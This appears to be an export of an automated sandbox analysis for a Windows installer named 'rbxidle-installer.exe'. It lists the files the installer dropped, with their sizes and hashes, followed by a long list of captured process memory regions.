C:\Users\Admin\AppData\Roaming\RBXIDLE\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
26B

MD5
2892eee3e20e19a9ba77be6913508a54

SHA1
7c4ef82faa28393c739c517d706ac6919a8ffc49

SHA256
4f110831bb434c728a6895190323d159df6d531be8c4bb7109864eeb7c989ff2

SHA512
b13a336db33299ab3405e13811e3ed9e5a18542e5d835f2b7130a6ff4c22f74272002fc43e7d9f94ac3aa6a4d53518f87f25d90c29e0d286b6470667ea9336ae

Download Submit
C:\Users\Admin\AppData\Roaming\RBXIDLE\settings.json

Filesize
347B

MD5
e6e02a6dd7ebbf81f234af83b4c67061

SHA1
4fbe7e6ae08d2139e27c6ef5452793ea79efc2d5

SHA256
d9e0207adb46dd2f854d7305b2e10aef47d702c034e00f20d7485f8e63ec020c

SHA512
666c92a4890113f353c9f5e9cc5b1bb065e0c718742c5b591c69845334bb7426ca234c14cf60f1371003fe697431c9429a73cc06df0c91de7c1567bfa984db7e

Download Submit
C:\Users\Admin\AppData\Roaming\RBXIDLE\settings.json

Filesize
345B

MD5
9f26401d59d52ae1200e1a940cf594f7

SHA1
90d9606cd7ffbb7788a4ce93da099e91b02d1d99

SHA256
5690c23eee7302a80f92c200ebcb618293c3a67ea191c4e25c15c20ea816a48b

SHA512
f92f884a4fc08f492218561aec3e44d0b70127a8b0b18907851ec4a4f7cc6d1509307a9c0fc6eb3ee3160813b91b269c45c5ed7664f91f599bced0a21e0fd538

Download Submit
C:\Users\Admin\AppData\Roaming\RBXIDLE\settings.json

Filesize
396B

MD5
8c57d2d5ce8e60321593255fdb3ed64b

SHA1
cf117285c609fd1780c17b8ad79d24a77e2c1139

SHA256
b4f87a9e7512880142ea34b32bfef6ac536535e68f67f079feab1187d4bf6e3e

SHA512
63ced16e792f724caa13517df30f147570d63efce4b2087e08a8e10602c4b8440bf3c52002c4b50fd530df737ed1bba79127de2373d137eb873d1df83f65f848

Download Submit
C:\Users\Admin\AppData\Roaming\RBXIDLE\yarn.txt

Filesize
761B

MD5
6352253c82df1675251f97eab2adeb46

SHA1
568f919a4b2aeb20a1b92163de18cba1c8973bff

SHA256
e2d0eda9294cea7695f1264745cd6b1b21abc9751081168378b974cc09defb5e

SHA512
991a7d4d433b7c76ca6b627ad8cc57bc4ecfb288c81c7f585f1ec767679dc039e15baf50703dc8863e5adb4a1f834818ed808b730aa32a310a8a37feb2da1e79

Download Submit
C:\Users\Admin\AppData\Roaming\e64900fa-585c-4f9f-8547-ce9312ef3f14.tmp

Filesize
1KB

MD5
2756ff2211ea9a389dfd0903e2c2c772

SHA1
1d4dadc37b71ddbbfaff6ff51caf506f82a2143b

SHA256
2214b04d306eff9128956596add3b110a42addd6ad081b2c40871c135efa9584

SHA512
1450f168ade31298aaa83a95362e0364ee4f471767237d1d010406c03ec6274354c6e3ff0c89cf9614b396d3a510c083dfb85f2ca0505554b667825a0b91d85e

Download Submit
C:\Users\Admin\AppData\Roaming\eb83554f-a20d-44ce-90c5-fc03d1e9c220.tmp

Filesize
1KB

MD5
1a7cdad19d059d5921cd4ee3211d4688

SHA1
8a4c2d10312cf7c37153a48ad110b3e1086d0386

SHA256
547c7a1f29f74fbfa14891760bfc14482762de05304fd10620bd0b84db0ec7c4

SHA512
1b6b5c6e6b6cd5aafe6eecd6c2df0a8c2c637292dd105ca1ca07fbd6eae35e2ee02bba747cbb9f7f370f3ef204ba0aa5cd4f21f972a50c59c980776e031aa84b

Download Submit
C:\Users\Admin\AppData\Roaming\fb69ebc4-f5f1-4b91-af02-de2598a345f9.tmp

Filesize
1KB

MD5
ac917da1092f1d93b7ea3c0e11f8b043

SHA1
6c6e5ad5ac251758c270c721d600e0b69cbe9cbc

SHA256
9edfd7bbd0173446bfbb61219b3f0ee9acbb653916c72ba33cc319f2ec86d70e

SHA512
329de0c4eee5c861c525b18769f25bd2db4ed1ac98031e6a82d76bcb30d2e148e541d338e068af42f10a89f6fe17e629aabba959b9107a72994c411385069cad

Download Submit
C:\Users\Admin\Downloads\rbxidle-installer.exe

Filesize
6.9MB

MD5
88cfd44049ca966be713de4e2a2c7d68

SHA1
cf57333640f44c2182fef467afcbdacba35b15c6

SHA256
8b8a48162f888ef01e6175b62b7b6246cfdc0b7f863fa328b66351c23c274730

SHA512
00411f5bfab666b3c152b355f087f1bf6b04802c4d181129bc92d45304c650cda874668ac281d24d384f0c03e3ba23b45e16f7faa3087d5dc1cc6caac576c909

Download Submit
C:\Users\Admin\Downloads\rbxidle-installer.exe

Filesize
4.4MB

MD5
f726533259a17da51177b2aaf1c7b760

SHA1
bd2929bd26ab6deb3f1aaada090e5bdd8d67a101

SHA256
4ef6f86e080f350374537c41b056b7d566b9807ba340ad5db2aeb99e89c4e454

SHA512
af7b82f78ebdc958c73a61785fa9a564f341a81d4adafe8fbfbe7cfe92bb9a9b600c5308c70917c1d96b8513d8e4aa17709ba3fc4e4d7ce3246cd5faf61f42cc

Download Submit
memory/1920-1424-0x000001DCD1140000-0x000001DCD1150000-memory.dmp

Filesize
64KB

Download
memory/1920-1425-0x000001DCD1140000-0x000001DCD1150000-memory.dmp

Filesize
64KB

Download
memory/2288-1124-0x0000000000400000-0x00000000004CB000-memory.dmp

Filesize
812KB

Download
memory/2288-99-0x0000000000400000-0x00000000004CB000-memory.dmp

Filesize
812KB

Download
memory/2288-80-0x0000000000400000-0x00000000004CB000-memory.dmp

Filesize
812KB

Download
memory/2368-1554-0x0000019CFDE30000-0x0000019CFDE40000-memory.dmp

Filesize
64KB

Download
memory/2368-1547-0x00007FFCC1CB0000-0x00007FFCC2771000-memory.dmp

Filesize
10.8MB

Download
memory/2512-1551-0x000002B35FC40000-0x000002B35FC50000-memory.dmp

Filesize
64KB

Download
memory/2512-1548-0x00007FFCC1CB0000-0x00007FFCC2771000-memory.dmp

Filesize
10.8MB

Download
memory/2512-1550-0x000002B35FC40000-0x000002B35FC50000-memory.dmp

Filesize
64KB

Download
memory/3112-1373-0x000001EE5D8F0000-0x000001EE5D98B000-memory.dmp

Filesize
620KB

Download
memory/3112-1234-0x00007FFCE0B20000-0x00007FFCE0B21000-memory.dmp

Filesize
4KB

Download
memory/3452-1094-0x0000000000920000-0x0000000000921000-memory.dmp

Filesize
4KB

Download
memory/3452-101-0x0000000000400000-0x0000000000705000-memory.dmp

Filesize
3.0MB

Download
memory/3452-961-0x0000000000400000-0x0000000000705000-memory.dmp

Filesize
3.0MB

Download
memory/3452-1090-0x0000000000400000-0x0000000000705000-memory.dmp

Filesize
3.0MB

Download
memory/3452-95-0x0000000000920000-0x0000000000921000-memory.dmp

Filesize
4KB

Download
memory/3452-141-0x0000000000400000-0x0000000000705000-memory.dmp

Filesize
3.0MB

Download
memory/3452-1121-0x0000000000400000-0x0000000000705000-memory.dmp

Filesize
3.0MB

Download
memory/3472-1394-0x000002A5C7C70000-0x000002A5C7C80000-memory.dmp

Filesize
64KB

Download
memory/3628-1417-0x00000213DB960000-0x00000213DB982000-memory.dmp

Filesize
136KB

Download
memory/3628-1388-0x00000213F3FD0000-0x00000213F3FE0000-memory.dmp

Filesize
64KB

Download
memory/3636-1515-0x00007FFCC1CB0000-0x00007FFCC2771000-memory.dmp

Filesize
10.8MB

Download
memory/3636-1543-0x0000023A2A060000-0x0000023A2A070000-memory.dmp

Filesize
64KB

Download
memory/4356-1540-0x0000021E47BD0000-0x0000021E47BE0000-memory.dmp

Filesize
64KB

Download
memory/4356-1541-0x0000021E47BD0000-0x0000021E47BE0000-memory.dmp

Filesize
64KB

Download
memory/4356-1539-0x00007FFCC1CB0000-0x00007FFCC2771000-memory.dmp

Filesize
10.8MB

Download
memory/4404-1335-0x0000000073AD0000-0x0000000074280000-memory.dmp

Filesize
7.7MB

Download
memory/4404-1285-0x0000000007620000-0x0000000007652000-memory.dmp

Filesize
200KB

Download
memory/4404-1096-0x0000000073AD0000-0x0000000074280000-memory.dmp

Filesize
7.7MB

Download
memory/4404-1097-0x0000000005230000-0x0000000005240000-memory.dmp

Filesize
64KB

Download
memory/4404-1098-0x0000000002CF0000-0x0000000002D26000-memory.dmp

Filesize
216KB

Download
memory/4404-1101-0x0000000005870000-0x0000000005E98000-memory.dmp

Filesize
6.2MB

Download
memory/4404-1102-0x0000000005760000-0x0000000005782000-memory.dmp

Filesize
136KB

Download
memory/4404-1108-0x0000000005F50000-0x0000000005FB6000-memory.dmp

Filesize
408KB

Download
memory/4404-1109-0x0000000005FC0000-0x0000000006026000-memory.dmp

Filesize
408KB

Download
memory/4404-1114-0x00000000061D0000-0x0000000006524000-memory.dmp

Filesize
3.3MB

Download
memory/4404-1127-0x0000000006640000-0x000000000665E000-memory.dmp

Filesize
120KB

Download
memory/4404-1128-0x0000000006680000-0x00000000066CC000-memory.dmp

Filesize
304KB

Download
memory/4404-1286-0x0000000075A20000-0x0000000075A6C000-memory.dmp

Filesize
304KB

Download
memory/4404-1296-0x0000000006C10000-0x0000000006C2E000-memory.dmp

Filesize
120KB

Download
memory/4404-1297-0x0000000007860000-0x0000000007903000-memory.dmp

Filesize
652KB

Download
memory/4404-1299-0x0000000007950000-0x000000000796A000-memory.dmp

Filesize
104KB

Download
memory/4404-1298-0x0000000007FA0000-0x000000000861A000-memory.dmp

Filesize
6.5MB

Download
memory/4404-1300-0x00000000079C0000-0x00000000079CA000-memory.dmp

Filesize
40KB

Download
memory/4404-1301-0x0000000007BD0000-0x0000000007C66000-memory.dmp

Filesize
600KB

Download
memory/4404-1227-0x0000000005230000-0x0000000005240000-memory.dmp

Filesize
64KB

Download
memory/4404-1303-0x000000007F000000-0x000000007F010000-memory.dmp

Filesize
64KB

Download
memory/4404-1302-0x0000000007B50000-0x0000000007B61000-memory.dmp

Filesize
68KB

Download
memory/4404-1307-0x0000000007B90000-0x0000000007BA4000-memory.dmp

Filesize
80KB

Download
memory/4404-1306-0x0000000007B80000-0x0000000007B8E000-memory.dmp

Filesize
56KB

Download
memory/4404-1308-0x0000000007C90000-0x0000000007CAA000-memory.dmp

Filesize
104KB

Download
memory/4404-1309-0x0000000007C70000-0x0000000007C78000-memory.dmp

Filesize
32KB

Download
memory/4844-1556-0x0000020DD8930000-0x0000020DD8940000-memory.dmp

Filesize
64KB

Download
memory/4844-1545-0x0000020DD8EC0000-0x0000020DD8F04000-memory.dmp

Filesize
272KB

Download
memory/4844-1555-0x0000020DD8F90000-0x0000020DD9006000-memory.dmp

Filesize
472KB

Download
memory/4844-1542-0x00007FFCC1CB0000-0x00007FFCC2771000-memory.dmp

Filesize
10.8MB

Download
memory/5100-1983-0x0000000057BE0000-0x00000000583A7000-memory.dmp

Filesize
7.8MB

Download
memory/5100-1378-0x0000000000840000-0x0000000000848000-memory.dmp

Filesize
32KB

Download
memory/5100-1384-0x00007FFCC1CB0000-0x00007FFCC2771000-memory.dmp

Filesize
10.8MB

Download
memory/5100-1549-0x0000000057BE0000-0x00000000583A7000-memory.dmp

Filesize
7.8MB

Download
memory/5156-1553-0x000002C1207F0000-0x000002C120800000-memory.dmp

Filesize
64KB

Download
memory/5156-1560-0x000002C1207F0000-0x000002C120800000-memory.dmp

Filesize
64KB

Download
memory/5156-1546-0x00007FFCC1CB0000-0x00007FFCC2771000-memory.dmp

Filesize
10.8MB

Download
memory/5232-1396-0x0000021F75DC0000-0x0000021F75DD0000-memory.dmp

Filesize
64KB

Download
memory/5232-1395-0x00007FFCC1CB0000-0x00007FFCC2771000-memory.dmp

Filesize
10.8MB

Download
memory/5308-1544-0x000001A4FB980000-0x000001A4FBA1B000-memory.dmp

Filesize
620KB

Download
memory/5308-1340-0x00007FFCE2190000-0x00007FFCE2191000-memory.dmp

Filesize
4KB

Download
memory/5308-1341-0x00007FFCE2630000-0x00007FFCE2631000-memory.dmp

Filesize
4KB

Download
memory/5536-1557-0x00007FFCC1CB0000-0x00007FFCC2771000-memory.dmp

Filesize
10.8MB

Download
memory/5556-1407-0x00000203E3B90000-0x00000203E3BA0000-memory.dmp

Filesize
64KB

Download
memory/5556-1406-0x00007FFCC1CB0000-0x00007FFCC2771000-memory.dmp

Filesize
10.8MB

Download
memory/5556-1418-0x00000203E3B90000-0x00000203E3BA0000-memory.dmp

Filesize
64KB

Download
memory/5564-1559-0x0000019DF5830000-0x0000019DF5840000-memory.dmp

Filesize
64KB

Download
memory/5564-1385-0x00007FFCC1CB0000-0x00007FFCC2771000-memory.dmp

Filesize
10.8MB

Download
memory/5564-1387-0x0000019DF5830000-0x0000019DF5840000-memory.dmp

Filesize
64KB

Download
memory/5564-1386-0x0000019DF5830000-0x0000019DF5840000-memory.dmp

Filesize
64KB

Download
memory/5860-1916-0x000001D690AB0000-0x000001D690AD0000-memory.dmp

Filesize
128KB

Download
memory/6080-1457-0x000001CD7A510000-0x000001CD7A520000-memory.dmp

Filesize
64KB

Download
memory/6080-1393-0x00007FFCC1CB0000-0x00007FFCC2771000-memory.dmp

Filesize
10.8MB

Download
memory/6612-1972-0x0000028BC1680000-0x0000028BC1681000-memory.dmp

Filesize
4KB

Download
memory/6612-1969-0x0000028BC1680000-0x0000028BC1681000-memory.dmp

Filesize
4KB

Download
memory/6612-1963-0x0000028BC1680000-0x0000028BC1681000-memory.dmp

Filesize
4KB

Download
memory/6612-1965-0x0000028BC1680000-0x0000028BC1681000-memory.dmp

Filesize
4KB

Download
memory/6612-1970-0x0000028BC1680000-0x0000028BC1681000-memory.dmp

Filesize
4KB

Download
memory/6612-1964-0x0000028BC1680000-0x0000028BC1681000-memory.dmp

Filesize
4KB

Download
memory/6612-1971-0x0000028BC1680000-0x0000028BC1681000-memory.dmp

Filesize
4KB

Download
memory/6612-1973-0x0000028BC1680000-0x0000028BC1681000-memory.dmp

Filesize
4KB

Download
memory/6612-1974-0x0000028BC1680000-0x0000028BC1681000-memory.dmp

Filesize
4KB

Download
memory/6612-1975-0x0000028BC1680000-0x0000028BC1681000-memory.dmp

Filesize
4KB

Download